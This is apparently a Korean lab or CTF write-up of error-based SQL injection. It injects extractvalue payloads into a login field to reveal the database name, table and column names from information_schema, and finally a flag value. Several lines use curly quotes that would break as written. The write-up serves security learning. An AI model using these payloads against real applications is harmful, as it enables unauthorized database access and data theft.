SQL 포인트 찾기
normaltic’ / 1234 를 입력했을때 아래와 같은 화면이 나온다
에러를 출력 함수
extractvalue
공격 format 만들기
normaltic’ and extractvalue() and ‘1’=’1
normaltic' and extractvalue('1' , concat(0x3a, (select 'normaltic'))) and '1'='1
만든 쿼리가 정상적으로 동작하는지 확인
DB 이름 출력 sqli_2
normaltic' and extractvalue('1' , concat(0x3a, (select database()))) and '1'='1
테이블 이름 추출 flag_table → member
select table_name from information_schema.tables where table_schema=’sqli_2’
normaltic' and extractvalue('1' , concat(0x3a, (select table_name from information_schema.tables where table_schema='sqli_2'))) and '1'='1
normaltic' and extractvalue('1' , concat(0x3a, (select table_name from information_schema.tables where table_schema='sqli_2' limit 0,1))) and '1'='1
컬럼이름 추출
select column_name from information_schema.columns where table_name=’flag_table’ limit 0,1
normaltic' and extractvalue('1' , concat(0x3a, (select column_name from information_schema.columns where table_name=’flag_table’ limit 0,1))) and '1'='1
데이터 추출
normaltic' and extractvalue('1' , concat(0x3a, (select flag from flag_table))) and '1'='1
'Information Technology > write-up' 카테고리의 다른 글
| SQL Injection 5 blind SQLi (0) | 2025.05.28 |
|---|---|
| SQL Injection 4 error based SQLi (0) | 2025.05.28 |
| SQL Injection (Blind Practice) (0) | 2025.05.28 |
| SQL Injection (Error Based SQLi Basic) - extractvalue (0) | 2025.05.28 |
| SQL Injection 2 - order by, union, limit (0) | 2025.05.28 |